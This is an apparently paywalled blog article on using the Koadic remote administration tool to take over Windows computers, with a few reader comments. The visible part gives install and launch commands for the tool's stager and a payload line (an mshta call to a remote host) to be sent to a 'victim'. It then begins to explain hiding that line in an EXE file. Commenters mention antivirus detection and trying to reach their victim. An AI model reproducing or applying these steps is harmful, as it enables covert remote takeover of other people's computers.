InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Follow publication

Hacking a Windows Machine by Hiding a RAT Inside the File

Frost
InfoSec Write-ups
Published in
4 min readSep 6, 2023

In this article, I will show you how to hack Windows computers using a Remote Administration Tool (RAT) called Koadic.

Koadic allows you to monitor and control Windows systems remotely. The tool facilitates remote access to Windows devices, working with practically every version of Windows, allowing you to have full control on a Windows system that has been compromised.

Install Koadic

Run the following command to install Koadic on Kali Linux.

sudo apt install koadic

Once done with that type the following command to start the tool.

sudo koadic

After that, you will see the Koadic interface.

The most useful command to gain an overview of Koadic usage is help.

The mshta stager is configured by default and ready to be started. Launch the stager by typing run on the Koadic command line.

So as an attacker, you need to send the payload link (mshta http://192.168.52.130.9999/PxKel) to the victim.

When the victim runs the mshta link, you will get full control over the Windows machine. In a real-world attack, the command would generally be executed by another program, or through an application.

So, let’s see how to create an EXE file with the mshta link. To do that I will use a program called “Bat To Exe Converter” on my Windows computer.

Here in the terminal window, you need to type start and copy mshta link from Koadic, then click on the save icon and save…

Create an account to read the full story.

The author made this story available to Medium members only.
If you’re new to Medium, create a new account to read this story on us.

Or, continue in mobile web

Already have an account? Sign in

Published in InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Written by Frost

Technology enthusiast with a special interest for self-improvement & cybersecurity. https://fastskill.net

Responses (3)

Write a response

File can not be sent via Gmail, albeit Protonmail will allow; however, when attemting to download onto Desktop, Malwarebytes will quickly quarantine file. Hence, this program is a total dud. Don't waste your time with this tool.

--

Hi, How can I get contact to you ?

--

Thank you for this article but I don't can access a remote terminal for my victim

--